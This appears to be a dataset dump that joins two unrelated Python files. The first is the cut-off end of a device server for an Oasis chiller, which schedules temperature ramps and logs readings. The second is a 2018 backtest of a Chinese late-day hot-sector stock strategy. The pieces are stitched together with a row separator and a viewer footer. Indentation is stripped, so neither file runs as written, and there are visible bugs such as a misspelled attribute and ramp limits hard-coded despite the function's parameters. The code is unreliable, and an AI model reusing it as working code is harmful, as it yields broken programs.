#build in indicators function. See the class file for details
def schedule_task_queue(self, msg_in = {b'method':b'ramp',b'start_time':time()}, client = None):
#build in schedule task queue function. See the class file for details
flag = True
message = None
err = ''
start_time = msg_in[b'start_time']
method = msg_in[b'method']
self.playlist = self.create_task_sequence(start_time = start_time); self.playlist_counter = 0;
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
#def circular_buffer(self, msg_in = None, client = None):
#build in get circular buffer function. See the class file for details
##################################################################################################################
##################################################################################################################
###### Threading Section ######
##################################################################################################################
##################################################################################################################
######
##################################################################################################################
def start(self):
from threading import Thread
task = Thread(target=self.run,name="oasis_dl.run")
task.daemon = True
task.start()
def stop(self):
"""
"""
self.running = False
def run_once(self):
"""
"""
t = time()
task = self.next_task(t = t)
debug('task = %r, time = %r' %(task,time()))
self.execute_task(lst = task)
self.last_update_time = t
def run(self):
""""""
from numpy import zeros
self.running = True
self.last_update_time = time()
if len(self.idle_playlist) == 0:
self.idle_playlist = self.default_playlist
while self.running:
t1 = time()
self.run_once()
t2 = time()
sleep(self.update_period - (t2-t1))
def next_task(self, t = 0):
"""
returns next task that needs to be executed.
Input:
- t as current time
"""
if self.idle_playlist_counter >= len(self.idle_playlist)-1:
self.idle_playlist_counter = 0
if len(self.playlist) ==0:
task = self.idle_playlist[self.idle_playlist_counter]
self.idle_playlist_counter +=1
if self.playlist_counter < len(self.playlist):
while self.playlist[self.playlist_counter][0] - t < 0:
self.playlist_counter +=1
if abs(self.playlist[self.playlist_counter][0] - t ) < 2.0*1.1:
task = self.playlist[self.playlist_counter]
debug(task)
self.playlist_counter +=1
else:
task = self.idle_playlist[self.idle_playlist_counter]
self.idle_playlist_counter +=1
else:
task = self.idle_playlist[self.idle_playlist_counter]
self.idle_playlist_counter +=1
return task
#def schedule(self, mode
def get_schedule_old(self, mode = '', start_time = 0):
lst = []
for i in range(10):
lst.append([start_time+ 20*i,1,5+i])
i += 5
lst.append([start_time+ 20*i,1,5+i-5])
for j in range(10):
lst.append([start_time+ 20*i+ 20*j,1,5+i-5-j])
lst.append([start_time+ + 20*i+ 20*j+20,1,5])
return lst
def create_task_sequence(self, mode = 'ramp', start_time = 0):
def ramp(low = 8.0,high = 45.0, step = 1, hold_low = 4, hold_high = 6, \
wait = False, idle_temp = 8.0, start_time = time() + 10, time_step = 12, \
repeat = 1):
lst = []
for i in range(1,int((45-8)/step)):
lst.append([start_time+ time_step*i,1,low+i*step])
for j in range(1,int((45-8)/step)):
lst.append([start_time+ time_step*i+time_step*hold_high + time_step*j,1,high-j*step])
lst.append([start_time+ time_step*i+time_step*hold_high + time_step*j+time_step*hold_low ,1,idle_temp])
return lst
if mode == 'ramp':
lst = ramp(start_time = start_time)
else:
lst = []
return lst
def execute_task(self, lst = [0,0,0]):
from numpy import zeros
if len(lst) != 0:
res_arr = zeros((2,1))
t_task = lst[0]
task = lst[1]
value = lst[2]
value = self.task_dictionary[task][b'function'](value)
res_arr[0,0] = time()
res_arr[1,0] = value
if task == 0:
self.circular_buffers[b'act_temperature'].append(res_arr)
self.act_temeprature = value
debug('%r get temperature executed: T = %r' %(time(),value))
elif task == 1:
self.circular_buffers[b'cmd_temperature'].append(res_arr)
self.cmd_temperature = value
debug('%r set temperature executed: T = %r' %(time(),value))
elif task == 2:
self.circular_buffers[b'fault'].append(res_arr)
self.fault = value
debug('%r get faults executed: T = %r' %(time(),value))
def plot_circular_buffers(self, x_ext = nan, y_ext = nan):
from matplotlib import pyplot as plt
pointer = self.circular_buffers[b'act_temperature'].pointer
buff = self.circular_buffers[b'act_temperature'].buffer
x1 = buff[0,:pointer+1]
y1 = buff[1,:pointer+1]
plt.plot(x1,y1,'o')
pointer = self.circular_buffers[b'cmd_temperature'].pointer
buff = self.circular_buffers[b'cmd_temperature'].buffer
x2 = buff[0,:pointer+1]
y2 = buff[1,:pointer+1]
plt.plot(x2,y2,'o')
plt.plot(x_ext,y_ext,'o')
plt.show()
##################################################################################################################
##################################################################################################################
###### ######
##################################################################################################################
##################################################################################################################
def init(msg_in = None, client = None):
try:
driver.ser.close()
except:
warn(traceback.format_exc())
if 'di245_dl' in globals():
global oasis_dl,device_level
del oasis_dl,device_level
oasis_dl = Oasis_DL()
device_level = oasis_dl
return oasis_dl.init()
oasis_dl = device_level = Oasis_DL()
from XLI.drivers.OasisChiller.serial_driver import driver
from XLI.server_LL import Server_LL
server = Server_LL()
server.init_server(name = 'OasisChiller_DL', ports = [2040,2041,2042])
###Callback function linking between incoming server commands and functions in the DL
server.commands[b'init'] = init
server.commands[b'abort'] = device_level.abort
server.commands[b'close'] = device_level.close
server.commands[b'snapshot'] = device_level.snapshot
server.commands[b'controls'] = device_level.controls
server.commands[b'indicators'] = device_level.indicators
server.commands[b'notify_subscribers'] = device_level.notify_subscribers
server.commands[b'schedule'] = device_level.schedule
server.commands[b'get_circular_buffer'] = device_level.get_circular_buffer
server.commands[b'subscribe'] = server.subscribe
if __name__ == "__main__": #for testing
from tempfile import gettempdir
import logging
logging.basicConfig(#filename=gettempdir()+'oasis_DL.log',
level=logging.DEBUG, format="%(asctime)s %(levelname)s: %(message)s")
self = device_level
msg = 'Oasis Chiller is running. \n'
msg += 'The server port %r and ip-address %r' %(server.port,server.ip_address)
print(msg)
print('oasis_dl.init(); oasis_dl.start();')
print('oasis_dl.playlist = oasis_dl.create_task_sequence(start_time = time()); oasis_dl.playlist_counter = 0;')
print('oasis_dl.plot_circular_buffers()')
print('oasis_dl.ctrls.set_cmd_temperature(7)')
print("t1 = time(); res = oasis_dl.retrieve_values(msg_in = \
{b'buffer_name':b'act_temperature', b'time_vector': asarray([time()-10,time()-20])}, N = 2);t2 = time(); t2-t1")
print('for i in range(len(arr)):arr[i] = time() - 100 - i*4')
from numpy import zeros
arr = zeros(10)
|
991,299 | 82d5d32f5ce3d00cd9434260e8368556dea4996f | # -*- coding: utf-8 -*-
"""
# 对尾盘策略的进行回测;
# 主要的纠结点在于板块的龙头股的确定;
Tue 2018/04/02
@author: Tracy Zhu
"""
# 导入系统库
import sys
# 导入用户库
sys.path.append("..")
from stock_data_task.find_hot_block import *
from stock_base.stock_file_api import *
picture_out_folder = ".\\stock_backtest\\picture\\"
trading_day_list = get_trading_day_list()
def get_select_stock_by_late_day(trading_day):
"""
首先根据分钟数据筛选出当日的热点板块,在从热点板块中找到龙头股票
:param trading_day:'2018-03-02"
:return:
"""
select_code_list = []
sorted_block_by_last_half_ratio, block_stock_dict = get_hot_block_late_day(trading_day)
for block_code_item in sorted_block_by_last_half_ratio[:3]:
block_code = block_code_item[0]
# print block_code
sorted_stock_list = block_stock_dict[block_code]
for stock_code, values in sorted_stock_list:
pct_chg = values[0]
if pct_chg < 0.09:
select_code_list.append(stock_code)
# print stock_code
break
return select_code_list
def get_hot_block_late_day(trading_day):
"""
根据盘后最后一段时间的筛选出排序的热点板块
:param trading_day:'2018-03-02'
:return:
"""
pre_trading_day = get_pre_trading_day_stock(trading_day)
spot_time = '14:30'
block_code_list = find_all_stock_concept_list_ifind('2018-03-30')
block_stock_dict = defaultdict()
last_hour_change_dict = defaultdict()
for block_code in block_code_list:
concept_code = block_code.split(',')[0]
stock_code_list = find_concept_stock_ifind(concept_code, '2018-03-30')
positive_ratio, positive_ratio_change, sorted_stock_list = block_describe_find_leading_stock(stock_code_list, trading_day, spot_time)
last_hour_change_dict[block_code] = (positive_ratio, positive_ratio_change)
block_stock_dict[block_code] = sorted_stock_list
sorted_block_by_last_half_ratio = sorted(last_hour_change_dict.items(), key=lambda d: d[1][1], reverse=True)
return sorted_block_by_last_half_ratio, block_stock_dict
def block_describe_find_leading_stock(stock_code_list, trading_day, spot_time):
"""
对每个板块的半小时变化进行排序,并找出其中的龙头股票。先按照涨跌幅进行排名,每个板块取前3只股票
:param stock_code:
:param trading_day:
:param spot_time:
:return:
"""
positive_ratio = -999
positive_ratio_change = -999
stock_default_dict = defaultdict()
percent_chg_list = []
positive_num = 0
spot_positive_num = 0
for stock_code in stock_code_list:
print stock_code
spot_yield, percent_chg, close_price = get_stock_slice_data_by_minute_data(stock_code, trading_day, spot_time)
if percent_chg > -12 and percent_chg < 12:
stock_default_dict[stock_code] = (percent_chg, close_price)
percent_chg_list.append(percent_chg)
if percent_chg > 0:
positive_num += 1
if spot_yield > 0:
spot_positive_num += 1
if len(percent_chg_list) > 0:
positive_ratio = float(positive_num) / float(len(percent_chg_list))
spot_positive_ratio = float(spot_positive_num)/ float(len(percent_chg_list))
positive_ratio_change = positive_ratio - spot_positive_ratio
sorted_stock_list = sorted(stock_default_dict.items(), key=lambda d: d[1][0], reverse=True)[:5]
return positive_ratio, positive_ratio_change, sorted_stock_list
def get_stock_after_trend(stock_code, trading_day):
"""
得出选出的股票的后期走势,取后面10个交易日的走势,开仓价格选出当天的收盘价
:param select_code_list:
:param trading_day:
:return:
"""
holding_days = 10
end_date = get_next_trading_day_stock(trading_day, holding_days)
df_table = get_stock_df(stock_code, trading_day, end_date)
pct_series = df_table.CLOSE / df_table.CLOSE.values[0] - 1
return pct_series
def get_block_after_trend(block_stock_code_list, trading_day):
"""
计算板块后面几天的收益率,看其分布
:param block_code:
:param trading_day:"2018-04-3"
:return:
"""
holding_days = 10
end_date = get_next_trading_day_stock(trading_day, holding_days)
stock_yield_dict = defaultdict()
for stock_code, values in block_stock_code_list:
pct_series = get_stock_after_trend(stock_code, trading_day)
stock_yield_dict[stock_code] = pct_series
stock_yield_df = DataFrame(stock_yield_dict)
pct_series = stock_yield_df.mean(axis=1)
index_df = get_index_data("000300.SH", trading_day, end_date)
index_yield = index_df['pct_chg'].sum()
pct_series = pct_series - index_yield / 100
return pct_series
def get_hot_block_after_trend(trading_day):
"""
首先根据前面最后半小时的筛选指标和热点板块,然后得出前三个热点板块
得出后面板块的走势
:param trading_day:"2018-04-03"
:return:
"""
pct_series_list = []
sorted_block_by_last_half_ratio, block_stock_dict = get_hot_block_late_day(trading_day)
for block_code_item in sorted_block_by_last_half_ratio[:3]:
block_code = block_code_item[0]
# print block_code
block_stock_code_list = block_stock_dict[block_code]
pct_series = get_block_after_trend(block_stock_code_list, trading_day)
pct_series_list.append(pct_series)
return pct_series_list
def yield_distribution_after_trend_plot(stock_pct_df):
"""
将后期每天的收益率分布绘制出来
:param stock_pct_df: dataframe, 是后面每一天的收益率分布
:return:
"""
global picture_out_folder
for index in stock_pct_df.index[1:]:
yield_distribution = stock_pct_df.loc[index]
yield_distribution = yield_distribution[yield_distribution > -1]
fig, ax = plt.subplots()
plt.hist(yield_distribution)
title = 'distribution of ' + str(index) + ' days'
fig.set_size_inches(23.2, 14.0)
plt.title(title)
out_file_name = picture_out_folder + title + '.png'
plt.savefig(out_file_name)
if __name__ == '__main__':
start_date = '20171129'
end_date = '20180406'
block_pct_dict1 = defaultdict()
block_pct_dict2 = defaultdict()
block_pct_dict3 = defaultdict()
count_num = 1
for trade_day in trading_day_list:
trading_day = trade_day[:-1]
if trading_day >= start_date and trading_day <= end_date:
trading_day_str = change_trading_day_format(trading_day)
pct_series_list = get_hot_block_after_trend(trading_day_str)
block_pct_dict1[count_num] = pct_series_list[0]
block_pct_dict2[count_num] = pct_series_list[1]
block_pct_dict3[count_num] = pct_series_list[2]
count_num += 1
block_pct_df1 = DataFrame(block_pct_dict1)
block_pct_df2 = DataFrame(block_pct_dict2)
block_pct_df3 = DataFrame(block_pct_dict3)
yield_distribution_after_trend_plot(block_pct_df3)
# select_code_list = get_select_stock_by_late_day(trading_day_str)
# # for stock_code in select_code_list:
# stock_code1 = select_code_list[0]
# pct_series1 = get_stock_after_trend(stock_code1, trading_day_str)
# stock_pct_dict1[count_num] = pct_series1
# if len(select_code_list) > 1:
# stock_code2 = select_code_list[1]
# pct_series2 = get_stock_after_trend(stock_code2, trading_day_str)
# stock_pct_dict2[count_num] = pct_series2
# count_num += 1
# stock_pct_df = DataFrame(stock_pct_dict1)
# stock_pct_df1 = DataFrame(stock_pct_dict1)
# stock_pct_df2 = DataFrame(stock_pct_dict2)
# yield_distribution_after_trend_plot(stock_pct_df2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.